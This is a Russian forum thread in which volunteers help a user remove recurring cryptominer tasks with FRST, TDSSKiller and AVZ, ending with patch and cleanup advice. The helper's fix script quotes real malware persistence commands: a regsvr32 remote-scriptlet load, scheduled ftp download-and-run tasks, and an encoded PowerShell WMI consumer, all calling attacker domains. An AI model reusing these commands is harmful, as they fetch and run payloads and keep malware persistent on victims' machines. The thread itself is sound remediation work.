Решена Как избавиться от майнеров mysa1,2

[пост]

Здравствуйте
Появились майнеры вроде mysa1,2 ok. Ну и при их удалении они появляются заново. Может ещё чего заодно вредного найдете.

 

[thyrex]

Скачайте Farbar Recovery Scan Tool

и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

1. Нажмите кнопку Scan.
2. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
3. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
4. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

+ Сделайте лог TDSSkiller

 

[пост]

В TDSS угрозы исправил только

 

[thyrex]

Логи работы TDSSkiller можно найти на диске С. Прикрепите их к следующему сообщению.

1. Выделите следующий код:

Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{53d9ff6b-15cf-422a-b4d4-c084b9630edb} <==== ATTENTION (Restriction - IP)
BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File
CHR HKU\S-1-5-21-3609701947-2038354220-1547297221-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
S2 Ms7DB53800App; C:\Windows\System32\Ms7DB53800App.dll [X]
2019-02-17 11:05 - 2019-02-17 11:05 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\new.exe
2019-02-17 11:05 - 2019-02-17 11:05 - 000037888 _____ (Orgs) C:\Windows\system32\s.exe
2019-02-15 21:42 - 2019-02-17 11:05 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\system32\max.exe
2019-02-15 21:42 - 2019-02-17 11:04 - 000221184 _____ (TODO: <公司名>) C:\Windows\system32\upsupx.exe
2019-02-15 21:42 - 2019-02-17 11:04 - 000037888 _____ (Orgs) C:\Windows\system32\u.exe
2019-02-14 20:09 - 2019-02-17 11:05 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-02-14 20:09 - 2019-02-17 11:05 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-02-14 20:09 - 2019-02-17 11:05 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-02-14 20:08 - 2019-02-17 11:05 - 000003518 _____ C:\Windows\System32\Tasks\Mysa
2019-02-14 20:08 - 2019-02-17 11:05 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-08-25 12:27 - 2019-01-07 14:46 - 000000086 _____ () C:\Program Files\Common Files\nsaok.dat
2018-03-16 13:34 - 2019-01-29 18:36 - 000000087 _____ () C:\Program Files\Common Files\xp.dat
2018-06-27 21:44 - 2019-02-17 11:04 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2017-12-26 15:13 - 2017-12-26 15:13 - 000091120 _____ () C:\Users\Andrey\AppData\Local\Temp\i4jdel0.exe
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
ContextMenuHandlers2: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
ContextMenuHandlers4: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
ContextMenuHandlers6: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => C:\PROGRA~1\GRIDIN~1\shellext.dll -> No File
Task: {3717A82C-3BBE-4FC3-BEE4-3ECF744DD20A} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
c:\windows\update.exe
Task: {7BB1C25F-F1EE-43D6-B439-290300DD5CC1} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
c:\windows\help\lsmosee.exe
Task: {BDC4A8F0-AACF-4D78-9196-FC5009491E61} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
c:\windows\debug\ok.dat
Task: {D6A967B2-6A86-4DAE-9BB0-CEE187F32EB0} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {DAAEE8C1-F9A6-4C36-AAC6-5287DC478A11} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
c:\windows\debug\item.dat
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION
AlternateDataStreams: C:\Users\Public\DRM:احتضان [98]
MSCONFIG\startupreg: Comrade.exe => C:\Program Files (x86)\GameSpy\Comrade\Comrade.exe
MSCONFIG\startupreg: qloader => C:\Users\Andrey\AppData\Roaming\ZZima\zzima_loader\nloader.exe -a
Reboot:
End::

1. Скопируйте выделенный текст (правая кнопка мыши – Копировать).
2. Запустите Farbar Recovery Scan Tool.
3. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

 

[пост]

Вот

 

[thyrex]

Проблема решена?

 

[пост]

Этот майнер удален, но остался некий msief.exe. Или надо новую тему создавать?

 

[thyrex]

Где остался? Вручную не удаляется?

 

[пост]

Он удаляется, но тоже восстанавливается. Может сейчас не будет, я посмотрю

 

[akok]

Может сейчас не будет, я посмотрю

???

 

[пост]

будет ли этот файл восстанавливаться, проверю

 

[akok]

Хорошо, сообщите результат и в зависимости от ответа или продолжим лечение или будут финальные рекомендации.

 

[пост]

Всё хорошо, больше нету ничего

 

[Sandor]

Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:

1. Запустите AVZ.
2. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
4. Закачайте полученный архив, как описано на этой странице.
5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.

 

[пост]

virusinfo_auto_ANDREY-ПК.zip

View and download from Yandex.Disk

yadi.sk

 

[akok]

Исправьте по возможности

------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
HotFix KB4056894 Внимание! Скачать обновления
HotFix KB4056897 Внимание! Скачать обновления
HotFix KB4074587 Внимание! Скачать обновления
HotFix KB4103712 Внимание! Скачать обновления
HotFix KB4343899 Внимание! Скачать обновления
HotFix KB4457145 Внимание! Скачать обновления
HotFix KB4462923 Внимание! Скачать обновления
HotFix KB4486563 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
WinRAR 5.30 (64-разрядная) v.5.30.0 Внимание! Скачать обновления
NVIDIA GeForce Experience 3.13.1.30 v.3.13.1.30 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Yandex v.19.1.1.909 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
--------------------------- [ UnwantedApps ] -----------------------------
Кнопка "Яндекс" на панели задач v.2.0.0.2116 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
UmmyVideoDownloader v.1.8.2.0 Внимание! Подозрение на Adware! Если данная программа Вам неизвестна, рекомендуется ее деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware и Malwarebytes AdwCleaner Перед деинсталляцией и сканированием обязательно проконсультируйтесь в теме форума, где Вам оказывается помощь!!!

По последнему блоку, если не используете, то деинсталлируйте.